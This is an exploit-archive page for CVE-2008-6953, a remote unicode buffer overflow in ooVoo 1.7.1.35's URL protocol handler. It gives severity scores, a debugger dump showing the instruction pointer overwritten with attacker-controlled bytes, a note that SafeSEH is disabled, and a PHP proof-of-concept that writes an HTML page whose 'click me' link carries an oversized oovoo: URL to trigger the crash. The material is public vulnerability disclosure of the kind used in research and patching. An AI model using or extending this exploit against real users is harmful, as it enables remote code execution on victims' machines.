ooVoo 1.7.1.35 (URL Protocol) remote unicode buffer overflow poc

2008.11.12
Credit: Pyrokinesis_at_nospam.it
Risk: High
Local: No
Remote: Yes
CVE: CVE-2008-6953
CWE: CWE-119


CVSS Base Score: 9.3/10
Impact Subscore: 10/10
Exploitability Subscore: 8.6/10
Exploit range: Remote
Attack complexity: Medium
Authentication: No required
Confidentiality impact: Complete
Integrity impact: Complete
Availability impact: Complete

<?php /* ooVoo 1.7.1.35 (URL Protocol) remote unicode buffer overflow poc by Nine:Situations:Group::bruiser tested against IE8b/xp sp3 9sg site: http://retrogod.altervista.org/ software site: http://www.oovoo.com/ description: ooVoo is a startup video conferencing and instant messaging application, similar to Skype Video.[1] ooVoo allows video chats with up to 6 participants, and unlike Skype Video, does not use a P2P network.[..] faultmon dump of oovoo.exe processing the url given: ... 04:22:10.875 pid=0E10 tid=0C08 EXCEPTION (first-chance) ---------------------------------------------------------------- Exception C0000005 (ACCESS_VIOLATION reading [0000005A]) ---------------------------------------------------------------- EAX=00000066: ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ?? EBX=00133D44: 6F 00 6F 00 76 00 6F 00-6F 00 3A 00 00 00 0F 00 ECX=00000000: ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ?? EDX=01D0DC28: 63 00 61 00 6C 00 6C 00-74 00 6F 00 3A 00 00 00 ESP=00133D00: 12 4E 43 00 AA A8 39 06-FF FF FF FF 01 00 00 00 EBP=00133F68: 63 00 63 00 63 00 64 00-64 00 64 00 64 00 65 00 ESI=00133F84: 66 00 00 00 68 B6 A2 01-00 00 00 00 00 00 00 00 EDI=00000000: ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ?? EIP=0040DF5A: 3B 48 F4 7F 16 52 8D 04-48 50 E8 89 9A 3F 00 83 --> CMP ECX,[EAX-0C] ---------------------------------------------------------------- 04:22:12.015 pid=0E10 tid=0C08 EXCEPTION (first-chance) ---------------------------------------------------------------- Exception C0000005 (ACCESS_VIOLATION writing [00000000]) ---------------------------------------------------------------- EAX=00000000: ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ?? EBX=00000000: ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ?? ECX=00610061: 00 00 00 89 84 24 86 00-00 00 89 84 24 8A 00 00 EDX=7C9132BC: 8B 4C 24 04 F7 41 04 06-00 00 00 B8 01 00 00 00 ESP=00133930: A8 32 91 7C 18 3A 13 00-5C 3F 13 00 34 3A 13 00 EBP=00133950: 00 3A 13 00 7A 32 91 7C-18 3A 13 00 5C 3F 13 00 ESI=00000000: ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ?? EDI=00000000: ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ?? EIP=00610061: 00 00 00 89 84 24 86 00-00 00 89 84 24 8A 00 00 --> ADD [EAX],AL ---------------------------------------------------------------- ... additional notes: oovoo.exe, compiled with /SafeSEH=OFF reg key: HKEY_CLASSES_ROOT\ooVoo\shell\open\command "e:\oovoo\oovoo.exe" "%1" */ $bof="<html><a target=\"_blank\" href=\"oovoo:?" . str_repeat("\x0f",258). "bbbbaaaaccccddddeeeeffff". "\">click me</a></html>"; $fp=fopen("oovoo_poc.html","w+"); fputs($fp,$bof); fclose($fp); ?> original url: http://retrogod.altervista.org/9sg_oovoo_url_poc.html

References:

http://www.securityfocus.com/bid/32251
http://osvdb.org/49791
http://xforce.iss.net/xforce/xfdb/46549
http://www.vupen.com/english/advisories/2008/3124
http://www.securityfocus.com/archive/1/archive/1/498235/100/0/threaded
http://www.milw0rm.com/exploits/7090
http://secunia.com/advisories/32698
http://retrogod.altervista.org/9sg_oovoo_url_poc.html
http://archives.neohapsis.com/archives/bugtraq/2008-11/0082.html


See this note in RAW Version
Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2024, cxsecurity.com

 

Back to Top